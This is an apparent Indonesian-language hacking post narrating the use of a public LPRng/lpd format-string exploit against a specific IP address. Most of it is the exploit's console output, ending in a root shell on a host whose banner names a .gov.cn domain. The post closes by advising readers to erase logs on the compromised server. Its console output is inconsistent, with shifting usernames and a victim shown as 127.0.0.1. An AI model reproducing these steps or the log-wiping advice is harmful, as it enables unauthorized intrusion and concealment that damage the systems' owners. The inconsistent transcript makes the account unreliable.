Mungkin pengekzploitan bug pada LPD yang di mount sudah menjadi cerita basi bagi kalian yang sudah lama malang melintang di dunia bug, tapi mungkin menjadi berita baru bagi yang belum mengetahuinya. Kelompok security netcat, membuat sebuah script yang mampu meng-exploit security bug yang terdapat pada lpd dimana pada bug ini memungkinkan remote user untuk mendapatkan root akses. Berikut adalah percobaan yang telah dilakukan olehku dalam menggunakan script yang telah di sebar luaskan pada seluruh security team di internet. Aku mencobanya di Unix shell yang aku punya untuk mencobanya ke salah satu host yang setelah aku scan dia nge-mount LPD. Berikut adalah hasil percobaanku : [l33nux@localhost /home/l33nux]$ ls botdir/ lpd sco sco-pop.c SElpd.c sol solariz.c tel telnetd-bsd.c tooldir/ [alex@centrumpark /home/alex]$ ./lpd 167.205.153.137 -t 0 +++ www.netcat.it remote exploit for LPRng/lpd +++ Exploit information +++ Victim: 127.0.0.1 +++ Type: 0 - RedHat 7.0 - Guinesss +++ Eip address: 0xbffff3ec +++ Shellcode address: 0xbffff7f2 +++ Position: 300 +++ Alignment: 2 +++ Offset 0 +++ Attacking 127.0.0.1 with our format string Argh exploit failed$#%! try brute force! Percobaan pertama gagal, kemudian dilakukan exploit dengan menggunakan brute dan inilah hasilnya : [l33nux@localhost /home/l33nux]$ ./lpd 167.205.153.137 brute -t 0 +++ www.netcat.it remote exploit for LPRng/lpd +++ Exploit information +++ Victim: 127.0.0.1 +++ Type: 0 - RedHat 7.0 - Guinesss +++ Eip address: 0xbffff3ec +++ Shellcode address: 0xbffff7f2 +++ Position: 300 +++ Alignment: 2 +++ Offset 0 +++ Attacking 127.0.0.1 with our format string +++ Brute force man, relax and enjoy the ride ;> +++ The eip_address is 0xbffff3d8 - [+] shell located on 127.0.0.1 - [+] Enter Commands at will Linux xxz.gov.cn 2.2.16-22 #1 Tue Aug 22 16:16:55 EDT 2000 i586 unknown uid=0(root) gid=7(lp) nah kalian sudah berhasil mendapatkan akses root, kalau masih tidak percaya bisa kalian lakukan comand-comand yang kalian bisa untuk memuaskan diri kalian, selanjutnya terserah kalian :) *NOTE : - download patch-nya di http://www.redhat..com/support/errata/RHSA-2000-065-06.html - aku tidak menyarankan untuk melakukan peerusakan jika kalian berhasil melakukannya - tetaplah ingat ini hanya sebagai pengetaahuan saja - aku tidak bertanggung jawab jika tulisannku ini bisa merugikan orang lain ataupun diri kalian sendiri. - bila ingin selamat, hapuslah log kalian di server rooted tadi